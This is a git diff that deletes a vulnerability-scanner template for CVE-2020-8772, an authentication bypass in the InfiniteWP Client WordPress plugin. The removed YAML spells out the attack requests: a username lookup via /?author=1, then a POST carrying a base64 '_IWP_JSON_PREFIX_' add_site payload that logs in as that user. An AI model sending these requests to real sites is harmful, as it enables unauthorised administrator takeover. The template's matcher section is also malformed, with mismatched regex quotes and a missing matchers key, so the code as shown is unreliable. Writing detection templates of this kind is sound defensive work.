diff --git a/cves/2020/CVE-2020-8772.yaml b/cves/2020/CVE-2020-8772.yaml deleted file mode 100644 index a6eed0faea..0000000000 --- a/cves/2020/CVE-2020-8772.yaml +++ /dev/null @@ -1,70 +0,0 @@ -id: CVE-2020-8772 - -info: - name: InfiniteWP Client < 1.9.4.5 - Authentication Bypass - author: princechaddha - severity: critical - description: InfiniteWP Client plugin versions 1.9.4.4 or earlier contain a critical authentication bypass vulnerability. InfiniteWP Client is a plugin that, when installed on a WordPress site, allows a site owner - to manage unlimited WordPress sites from their own server. - reference: - - https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ - - https://wordpress.org/plugins/iwp-client/#developers - - https://wpscan.com/vulnerability/fac62d36-0fa1-4b43-8f5c-bddbd0cff140 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-8772 - remediation: Upgrade to InfiniteWP Client 1.9.4.5 or higher. - tags: wordpress,auth-bypass,wp-plugin - -requests: - - raw: - - | - GET /?author=1 HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9 - - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Content-Type: application/x-www-form-urlencoded - - _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}} - - redirects: true - extractors: - - type: regex - name: username - internal: true - group: 1 - part: body - regex: - - 'Author:(?:[A-Za-z0-9 -\_="]+)?" - - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/21